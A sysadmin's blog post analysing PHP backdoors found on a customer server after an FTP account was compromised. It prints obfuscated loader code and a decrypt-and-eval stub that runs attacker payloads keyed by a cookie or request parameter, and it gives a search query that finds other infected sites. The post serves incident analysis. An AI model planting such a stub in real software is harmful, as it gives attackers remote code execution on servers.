you have been hacked: zend_ion_index.php, wp_admin.php and inndex.php


Warning: in_array() expects parameter 2 to be array, string given in /virtual/theblogs.bestsolution.at/httpd/htdocs/wp-content/plugins/google-one/google-plus-one.php on line 344

Warning: in_array() expects parameter 2 to be array, string given in /virtual/theblogs.bestsolution.at/httpd/htdocs/wp-content/plugins/google-one/google-plus-one.php on line 346

From time to time, operating internet services can be quite demanding, especially when things don’t run the way they should.

A perfect example for this is what happened yesterday. We were notified by an automated watchdog service that one of the systems we are operating on behalf of our customers had been compromized by some hackers, abusing the compromized box as a storage for their data.

A look into the logs quickly revealed that the hackers had obviously gained access to an FTP account. So “fixing” the issue was not too difficult, a simple password change and removal of the alien data was easy to stop most of the problems.

three culprits 
Investigating the stuff they had uploaded, I found three interesting files that triggered my curiosity:

  • inndex.php
  • wp_admin.php
  • zend_ion_index.php

For a PHP script, the first file is the quite difficult to analyze. The code looks like this:

<?php for($o=0,$e='&amp;\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&amp;
 
[...]
 
(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o&lt;16){$h[$e[$o]]=$o;}else{
$d.=@chr(($h[$e[$o]]&lt;&lt;4)+($h[$e[++$o]]));}}eval($d); ?>

So this is just a 12K big portion of scrambled eggs. Dissecting the piece further, I quickly found that the “eval($d)” just produced another, almost equally scrambled PHP output, but with a different ending (I’ve reformatted pieces of the code in order to improve readability):

for($o=0,$e='&\'()*+,-.:]^_`{|+:*+,
[...]
|(,\'|*:,\'',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{
$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}
 
if( !@isset( $_SERVER ) ) {
  $_COOKIE=&$HTTP_COOKIE_VARS;
  $_POST=&$HTTP_POST_VARS;
  $_GET=&$HTTP_GET_VARS;
}
$k=$_COOKIE['key'];
if ( empty( $k ) ) {
  $k=$_POST['key'];
}
if( empty( $k ) ) {
  $k=$_GET['key'];
}
if ( ! @function_exists( 'decrypt' ) ){
  eval( 'function decrypt( $e, $k ) {
    if(!$k){
      return;
    }
    $el = @strlen( $e );
    $kl = @strlen( $k );
    $rl = $el%$kl;
    $fl = $el - $rl;
    for( $o = 0; $o < $fl; $o += $kl ) {
      $p = @substr( $e, $o, $kl);
      $d .= "$k"^"$p";
    }
    if ( $rl ) {
      $p = @substr( $e, $fl, $rl);
      $k = @substr( $k, 0, $rl);
      $d .= "$k"^"$p";
    }
    return( $d );
  }');
}
$d = @decrypt( $d, $k );eval($d);

In other words: the script expects a parameter “key”, either passed as a cookie or as a HTTP GET parameter. With that very parameter as the salt, it decrypts $d. Now, unfortunately, I don’t have that key and so far have not been able to retrieve one from the server logs, neither cookies nor GET parameters are logged by default, so that script will probably remain undisclosed.

excellently crafted work 
The other two scripts, wp_admin.php (that has absolutely nothing to do with the wordpress wp_admin.php, the site does not even run wordpress) and zend_ion_index.php are different, luckily. They are equally scrambled but contain a scrambled version of the key within their code, so the issue was just to crack the MD5 keys using the “usual sources” and then voila, you actually get a very decent PHP file manager, see for yourself:

the wp_admin file manager in action

What a sad thing that this tool is not used for good, this looks like a truly excellent piece of work that could come handy for any sysadmin.

The file manager even allows you to connect the file manager to a remote control server, allowing to administrate the compromized box without making even log entries in access.log or similar.

Both wp_admin.php and zend_ion_index.php contain the same file manager, but in different versions.
Removing the tools was not difficult of course and luckily the hackers didn’t have the intention to destroy anything on the webserver itself, so the damage is limited.

A listing of more than 200 compromized sites (and growing) 
What really scares me, however, is this google query:

https://www.google.com/?q=zend_ion_index.php

Go and try it for yourself, you get a listing of more than 200 compromized sites, most of them have at least wp_admin.php installed as well …

Unfortunately, due to the sheer number, I just don’t see a way how to inform the affected administrators …

Spread the love

2
Leave a Reply

avatar
2 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
Anonymous Recent comment authors
  Subscribe  
newest oldest most voted
Notify of
Anonymous
Guest
Anonymous

I have come across these same files on a couple compromised servers. I’d love to share/compare notes. I wrote a beautiful python script that cracked the key for me in a couple minutes 😉

Drop me a line at officer a7 militia d0t cc

Anonymous
Guest
Anonymous

whats the key?

Post Navigation